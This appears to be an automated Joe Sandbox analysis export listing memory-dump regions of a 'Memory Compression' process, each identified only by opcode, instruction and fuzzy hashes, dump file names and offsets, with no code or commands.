                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction ID: 3f30107b863401dbec20e3c3748d4395438a1019c9fff694adbb9adf4086799d
                                      • Opcode Fuzzy Hash: be9842fc13542e35f4f32ba56046e47fce3f0b2bca9fd1078a34e8b318d9d2f0
                                      • Instruction Fuzzy Hash: D3512812E1D6924FE31166BCA8592E57FA0FF513A0F1C81B7D088EA0D7DD18AC4AC391
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction ID: 00283fce5c56df459f1ecfd69ef2d6a5067bea56b5a0950e51b3e159f997c73f
                                      • Opcode Fuzzy Hash: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction Fuzzy Hash: C6118E7091864E8FDB95EF64885A6BD7BF0FF18340F5404BED419D7192DB39A940CB01
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c052f564cba2a7c5636d67724df816419be1a54351c729e74067c807a429b24f
                                      • Instruction ID: 9dfb114721afc9d60b980197abb4031b840a5607921ab50f85fa1c628fac1b58
                                      • Opcode Fuzzy Hash: c052f564cba2a7c5636d67724df816419be1a54351c729e74067c807a429b24f
                                      • Instruction Fuzzy Hash: 1C119E7091964E8FEB99EB6884596BE7BE0FF28340F1405BEC41DC7596CE38A451C702
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5474869c0a19b84d58d122d85694b8676af0633cddb140fe1003bfaa06cb49b
                                      • Instruction ID: ebeaaeb2bfcc578196ead964a138d4029ebfff8dbc76b0867bd8ea4e1f193ba2
                                      • Opcode Fuzzy Hash: f5474869c0a19b84d58d122d85694b8676af0633cddb140fe1003bfaa06cb49b
                                      • Instruction Fuzzy Hash: ED11737092DA4A8FE751EB7485596BA7BE0FF19340F1505BAC448C7163DE38A944C702
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction ID: 663f8e9f4c75b72599cf7f4f842a8e5bf46515b4c65d9195a7be89c338a427c8
                                      • Opcode Fuzzy Hash: 187bf45c215fa3693190160eb742d17fe6b179701dcbc437012e3d9b342abb82
                                      • Instruction Fuzzy Hash: F0018F31D1D64E8FEB52EB7484496BD7BE0FF19340F9909B6D408D70A2EA38E844C741
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9843af8824fb5f1faedfce7114180b5773dadd4fd359df5a715977cc638da6c7
                                      • Instruction ID: 6db100c86e40c55b5b5f0eef169ab463d520d8d86d77d23eaf24f05dbb0adc20
                                      • Opcode Fuzzy Hash: 9843af8824fb5f1faedfce7114180b5773dadd4fd359df5a715977cc638da6c7
                                      • Instruction Fuzzy Hash: CE115E7092864A8FEB45EB6484596BA77E1FF28340F1405BED41DC65A2DB38A550CB42
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ff6e927e156daed14088f31fc5cdabe558da564b1f0704a9f1eafbd814a4bf2
                                      • Instruction ID: 54f4032c786d7b5566c7bd131cf516bd5d17c02197bff274879d8a6115070879
                                      • Opcode Fuzzy Hash: 6ff6e927e156daed14088f31fc5cdabe558da564b1f0704a9f1eafbd814a4bf2
                                      • Instruction Fuzzy Hash: FA11BE70E18A5A9EEB94DB18C449BAAB3F1FF58340F1586AAC40DE3155CF34AD85CB40
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction ID: 3416d697ef6b74ea7d264aaac80a0d52de96b5d4240dc7a1dc61bdfcda3f5929
                                      • Opcode Fuzzy Hash: 5651eaa5204f5c765152c9abcc744ca2c95022cdb2da528db4b0e6f09e22b256
                                      • Instruction Fuzzy Hash: 52019A3091890E8FEB89EF24C0596FA77A1FF58354F64057ED40ED7294CA36A990CB80
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10eab480ca163f0ea956cd16f71223048fbbabac5c999a3eee3303c097d868ec
                                      • Instruction ID: 1045679b6c505efb5876bdea3d632d2fe05cbe7fada00dbe032c35c633f3a635
                                      • Opcode Fuzzy Hash: 10eab480ca163f0ea956cd16f71223048fbbabac5c999a3eee3303c097d868ec
                                      • Instruction Fuzzy Hash: 2B11D770D185298EEBA4EB14C8457FDB6B2FF58340F6441BAD40DE6291DE38AE80CF00
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d40204dbd5bfa6e814f114fd469353f9cca45ea31848623f4596724ac87a3e2f
                                      • Instruction ID: 5cdb548d8fd0fafb8cbdb636bd6c2c348f1984b15aeb04143897578b6a8ebe39
                                      • Opcode Fuzzy Hash: d40204dbd5bfa6e814f114fd469353f9cca45ea31848623f4596724ac87a3e2f
                                      • Instruction Fuzzy Hash: 7301DB3096964A8FDB49EF64C45A3BA7BA0FF09300F2508BEC40EC7092CA39A940C701
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b21f4f0f6ed3669b1a6170addf69f1f01e3214fd0dc88b8f6f89de97fde8f9e8
                                      • Instruction ID: 99883d54a4bf16383f86c01904a5f38dbd5087b2fc6a710905aee233891f742a
                                      • Opcode Fuzzy Hash: b21f4f0f6ed3669b1a6170addf69f1f01e3214fd0dc88b8f6f89de97fde8f9e8
                                      • Instruction Fuzzy Hash: A7015E3091891E8FEB88EFA8C4592BE7BE1FF18340F24087AD81EE3191DE75A950C741
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da3fbc7bdeedb5fe9beb7ec423e82f790b3f4f4e821c5b1329925ea49ab29368
                                      • Instruction ID: 70d5c1ce554d15631db6b82a395281be1f41513fea3c7b172bc7b7dd81852c4e
                                      • Opcode Fuzzy Hash: da3fbc7bdeedb5fe9beb7ec423e82f790b3f4f4e821c5b1329925ea49ab29368
                                      • Instruction Fuzzy Hash: 2301F53091D6898FDB4ADB2484692BA3FB0FF1A340F1104FEC44ACB092DE3DA840C742
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction ID: 03f98b66cea2b6e5ea8eaaf72d1b5f9849d73395ba37fe2d792a1ba9a2166c82
                                      • Opcode Fuzzy Hash: 45bba6dd6f04570ea3fb06a2f39894c9bc618ce16a585011c7cc78b0d5d1cf20
                                      • Instruction Fuzzy Hash: E6018F30D1864D8FE791AB64844A2F97BF0FF59340F9945B6D408D70A2EE38E984C741
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6b4e009f42ef4c55db5ba81758bc8d611877a230e809995f9a23c97711e7144
                                      • Instruction ID: 48ff7d0a148cb468b9ae5718323ae8bc294e9ffef592aeef2d23bbf611b1379b
                                      • Opcode Fuzzy Hash: e6b4e009f42ef4c55db5ba81758bc8d611877a230e809995f9a23c97711e7144
                                      • Instruction Fuzzy Hash: 0901D430D1D6498FE742AB7888591B97BF1FF09340F1908F2D458DB0A3EE38A844C702
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction ID: 2ad830d1c52544f904f062ac977106fe520626c2b61fbbe35548449a61243360
                                      • Opcode Fuzzy Hash: d60465ec4210787c5d311ee31a28ecec098a3f5e6689bdf1139be1aee059182e
                                      • Instruction Fuzzy Hash: 0D018431D1D68A4FE752EB74885A5B97BF0FF49340F5909F7D408DB0A2EA28A894C701
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction ID: 0bcbc95593f9e0b9b297d8f6002ba06db965d882e35905c2bde4ea131c5695cf
                                      • Opcode Fuzzy Hash: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction Fuzzy Hash: 7B113C71D2811ACFEB14EF68C4447FCB6B1FF54341F6040BAE419A6282DB385A84EF54
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7332d628a481d8b403e231594e01ebaf4ae1a95fa2c3eccd7a8aba95fb86762b
                                      • Instruction ID: d853a6e165140959628476cc94c94116ee952149f2a07d5291c86e3802d6dfe2
                                      • Opcode Fuzzy Hash: 7332d628a481d8b403e231594e01ebaf4ae1a95fa2c3eccd7a8aba95fb86762b
                                      • Instruction Fuzzy Hash: 8201A73092D68A4FEB52EB7884995A97FF0FF09340F1505F3D508CB0A2DE38A844C702
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 815125a8c34ef084c5499d8ea473ea777f42e5212568e3b1d82f2ebd7611a44e
                                      • Instruction ID: 1b519ed0e1b2641d40ccab316885b76863ab9ee2f52a06f31dbc261bfd9f9c7d
                                      • Opcode Fuzzy Hash: 815125a8c34ef084c5499d8ea473ea777f42e5212568e3b1d82f2ebd7611a44e
                                      • Instruction Fuzzy Hash: FA01D4309696498FDB88EB68C56D2BE7FA0FF09340F1414BED40ACB192DE39A940C741
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60aa6fa95479a5a0902439e3a2958785d4f6a202422cb09a505bcd358cc8139b
                                      • Instruction ID: a3c6568d3577a2c5b69624be2f9f51daaad8daa58ba33b17eedd0a860bb9b82e
                                      • Opcode Fuzzy Hash: 60aa6fa95479a5a0902439e3a2958785d4f6a202422cb09a505bcd358cc8139b
                                      • Instruction Fuzzy Hash: CF01697091850E8EEFA9EF6894692F97BE0FF18341F6408BED80EE6091DE35A950C701
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d060ce63f5ed8696c33b83f023329b386b07fcb7ee432fe172044195463e48e
                                      • Instruction ID: 33a85c52afdfed58b2ac4d6895e15b89dce42938e5222252637af76ba642b1a2
                                      • Opcode Fuzzy Hash: 4d060ce63f5ed8696c33b83f023329b386b07fcb7ee432fe172044195463e48e
                                      • Instruction Fuzzy Hash: C00181B4E1991E8EE781EB78C44D6F977E2FF58340F6944B5D40ED70A2ED34A884C642
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction ID: b9bb9fd118b88aebac5b1f48be4133159bbc12c02df9bd6d89431edc0344980a
                                      • Opcode Fuzzy Hash: 134337a0cb883f5c7265298eb8294598d9bfbe467736b93fbf7317a4396a767a
                                      • Instruction Fuzzy Hash: 8E01D13090964D8FEB99DF14845A2FA3BA0FF59310F68007AD808C6191CA35D850CB80
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction ID: 7c11c3cdf9bde6e6910f84fa41825fd6cf12104e67711834317501b52aa1851e
                                      • Opcode Fuzzy Hash: 9c4503b740d6c41850aa0c167a617c87858254836757aa0890f5d87c9f329948
                                      • Instruction Fuzzy Hash: B401D13091851E9FEB48EB64C0592B973E0FF08345F60087ED40EE21D1DE79A990C601
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction ID: b19bd0d21a16b8445d9e0d16050de85f595448618314a7c4672e7da5fcb2c2ed
                                      • Opcode Fuzzy Hash: f4b4a04022f1d92aa8f8fa1f9320b5c04667482e45aa62795d03627a697065aa
                                      • Instruction Fuzzy Hash: 1201AF3092851E9FEB59EF64C45A2BA73A0FF18344FA008BEE41ED61D1DF79A990C701
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction ID: 9f4fe7548401c8216a947d52e80e73327fc52bc1c0199c9dd068cc00f7ebb171
                                      • Opcode Fuzzy Hash: 94c108e68c58f5691af5c187e66e67e6cd1fd574d30f8f730fbb3be5aa176c7a
                                      • Instruction Fuzzy Hash: B1F0F430D1861E89FB989B6898483FA77E0FF66361F18057AD409E20C1DE341858C640
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction ID: f2e8cbee68fe69922721d7baf51b87bafbce2096692d0af9ddee75a9a98ee37e
                                      • Opcode Fuzzy Hash: d3bdd292219c0ef9512caa8e5bc8aaf677917915682f86626eac41c4d01fefcf
                                      • Instruction Fuzzy Hash: D0F0F03081960E8FEB89EF2494452FA37A0FF19354F68053AE80DD7181CB39E8A0CB81
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e438fbea4321bf091ac56d14ba603d9dc85d7451cc926f20bcc2a21bd618a974
                                      • Instruction ID: d0c7a79d115fa315d45170615059a981d23d982603972a05109c5adff55d765f
                                      • Opcode Fuzzy Hash: e438fbea4321bf091ac56d14ba603d9dc85d7451cc926f20bcc2a21bd618a974
                                      • Instruction Fuzzy Hash: D401E231D186198FEF54EF94C4946ECBAB1FB18361F28016ED009F2281DB386984CB15
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3fca14af1ad70f05c63e7e8fe341ae65aa864918d12d7e093f62c7577655f49
                                      • Instruction Fuzzy Hash: 4A118E709186498FDB58DF58C4965F93BE1FF58354F11027EE80EC3185CA38A880CB91
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cef52d721ce85d58838b4b39ad626379abb294500b48d8d0d9b250bc4ea0d75d
                                      • Instruction ID: 3fe88fb29df0dc2aca18ee7ea233f306543879afb897fa2fb0734abfd3b681fb
                                      • Opcode Fuzzy Hash: cef52d721ce85d58838b4b39ad626379abb294500b48d8d0d9b250bc4ea0d75d
                                      • Instruction Fuzzy Hash: EE21C030E0864D9FEB99EF6884592B97BE0FF69340F1405BAD40DCB592CA38A944C751
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddd0ab69e1fa30f87a51fcf88f665ad2ee60aebf0470841bf7201e53a5d8a0f9
                                      • Instruction ID: 3658ad3515c01a38773bae363502635a540171fe2909a5a05b11c95b3d101169
                                      • Opcode Fuzzy Hash: ddd0ab69e1fa30f87a51fcf88f665ad2ee60aebf0470841bf7201e53a5d8a0f9
                                      • Instruction Fuzzy Hash: 2711B2B0D0DA8D8FEB5ADB6488A52B87BB0FF69340F1504FED04DC7592DA296844C752
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67413f633cff824faa1b7a9e15c94a77f4373bd89c8ead82f9112d42863ed5ee
                                      • Instruction ID: 7fa17f2ef7318ec9b869f11c2cdd357ab30a246f6d30d4b878b8df9f72bc4949
                                      • Opcode Fuzzy Hash: 67413f633cff824faa1b7a9e15c94a77f4373bd89c8ead82f9112d42863ed5ee
                                      • Instruction Fuzzy Hash: A611583090864E8FDB89EF64C8592FA7BB1FF69301F5005BAD409C7592DA35A980C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c65f3ad82e2cefd6eead854c3f7d8f745b72ca239a1a64953732d43b4d26374
                                      • Instruction ID: 9f62372fa8f5757b486001587e6fb7ca3bc2ab33c4ecbf44523426f400b4524e
                                      • Opcode Fuzzy Hash: 0c65f3ad82e2cefd6eead854c3f7d8f745b72ca239a1a64953732d43b4d26374
                                      • Instruction Fuzzy Hash: 41117030D0C55A9FEB41EB78C88C6AA7BE0FF19380F1409B6D509C7055DA38A980C761
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8005e3a24583be74f2c00a25665cf9db7191c4d6531c4ad3ac0e31a1a8dd8dd0
                                      • Instruction ID: 6e547ecd08cfa59dfc6d735032eb8222ccfd08fd20d22b98cb72e383980459ae
                                      • Opcode Fuzzy Hash: 8005e3a24583be74f2c00a25665cf9db7191c4d6531c4ad3ac0e31a1a8dd8dd0
                                      • Instruction Fuzzy Hash: 36112370D1DA898BEF99DF6488E52B83BE0FF55300F1400BED10DC31A2CE285848C712
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction ID: 3bf9d82c4737c4c1ce0e6f2b07ba3a4bbfe5ed6bb1bc27bd3ae65b8e587d52fd
                                      • Opcode Fuzzy Hash: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction Fuzzy Hash: BE11BF70918A4E8EEB999B68C8587FA7BF0FF2A351F1005BEC41AC61D3DE296844C700
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f218110a7ee1e3e48c8b2561c9ae5052ffcbc32fca302f130485b474d287824
                                      • Instruction ID: 36193dc3a5813ea7e7da1c3f669c9c3519861113282d9731f5520a2b9141cc99
                                      • Opcode Fuzzy Hash: 2f218110a7ee1e3e48c8b2561c9ae5052ffcbc32fca302f130485b474d287824
                                      • Instruction Fuzzy Hash: C501A130D1855A8EEB42EBB8844D5F97BF0FF09340F1409B6D448C7062DA349584C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bc6446e44a987bf96504dc780b7ad9205697de7144597d6eae3cf0fe50718c0
                                      • Instruction ID: 225f4fd76c3b2f82d5aba4981ff29a5edab8a1a306696916a17b6ec670f5378d
                                      • Opcode Fuzzy Hash: 6bc6446e44a987bf96504dc780b7ad9205697de7144597d6eae3cf0fe50718c0
                                      • Instruction Fuzzy Hash: 2811C130D0864E8FEF59EF6884992BA7BA0FF68340F2401BAD44DC3192CE38A845C751
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 47cbf94359a2807c9437c608b43ca0ffa57a8b98d468ac35d45d64e5af831f9f
                                      • Instruction ID: 63c81686bb619d5bd8d9bd9b3c586767ba2fa200c0b15836857146419484ea9c
                                      • Opcode Fuzzy Hash: 47cbf94359a2807c9437c608b43ca0ffa57a8b98d468ac35d45d64e5af831f9f
                                      • Instruction Fuzzy Hash: 7D116DB0D1868E8FEB56EB6488692BD7BE0FF19341F1405BAD409C7192DE39A944C712
                                      Memory Dump Source
